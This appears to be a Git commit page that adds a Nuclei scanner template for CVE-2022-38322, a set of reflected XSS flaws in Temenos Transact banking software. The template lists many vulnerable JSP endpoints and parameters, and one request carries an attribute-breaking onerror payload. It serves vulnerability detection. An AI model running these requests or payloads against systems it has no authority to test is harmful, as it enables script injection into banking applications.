daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added template for CVE-2022-38322

main
Ashraf Harb 1970-01-01 00:00:00 +00:00
parent 011f171678
commit b53d585dc5
1 changed files with 40 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
CVE-2022-38322.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-38322
info:
name: Multiple Reflected XSS in Temenos Transact (Previously T24)
author: qotoz
severity: high
tags: xss, transact, t24 , temenos
reference:
- https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
requests:
- method: GET
path:
- "{{BaseURL}}/jsps/enqrequest.jsp?enqaction=XSS&enqname=XSS&routineArgs=XSS&skin=XSS&compId=XSS&usrRole=XSS&compScreen=XSS&contextRoot=&windowName=XSS&user=XSS&reqTabid=XSS&WS_replaceAll=XSS&WS_parentComposite=XSS&command=&formToken="
- "{{BaseURL}}/jsps/about.jsp?skin=XSS&release=XSS"
- "{{BaseURL}}/jsps/continue.jsp?cfwstage=XSS&compId=XSS&skin=XSS&user=XSS&windowName=XSS"
- "{{BaseURL}}/jsps/customMessage.jsp?Message=XSS"
- "{{BaseURL}}/jsps/dropdown.jsp?title=XSS&routineArgs=XSS&routineName=XSS&searchCriteria=XSS&dropfield=XSS&compId=XSS&usrRole=XSS&skin=XSS&windowName=XSS&parentWin=XSS"
- "{{BaseURL}}/jsps/fileUpload.jsp?skin=XSS&trans_upload=XSS&trans_uploading=XSS&fragment=XSS"
- "{{BaseURL}}/jsps/genDocRequest.jsp?imageId=XSS&isPopUp=XSS&enqid=XSS"
- "{{BaseURL}}/jsps/helprequest.jsp?url=XSS"
- "{{BaseURL}}/jsps/submitWindow.jsp?requestType=XSS&routineArgs=XSS&companyId=XSS&unlock=XSS&closing=XSS&pwprocessid=XSS&windowName=XSS"
- "{{BaseURL}}/jsps/svgInstall.jsp?skin=XSS"
- "{{BaseURL}}/jsps/txnrequest.jsp?usrRole=XSS&routineArgs=XSS&compId=XSS&compScreen=XSS&user=XSS&skin=XSS"
- "{{BaseURL}}/jsps/genrequest.jsp?routineName=XSS&routineArgs=XSS&skin=XSS&compId=XSS&compScreen=XSS&contextRoot=&user=XSS&formToken="
- "{{BaseURL}}/jsps/helprequest.jsp?url=XSS%27)%22+onerror=%22confirm(%27XSS%27)%22+test=%22"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
matchers-condition: and
matchers:
- type: word
words:
- "XSS"
part: body
- type: status
status:
- 200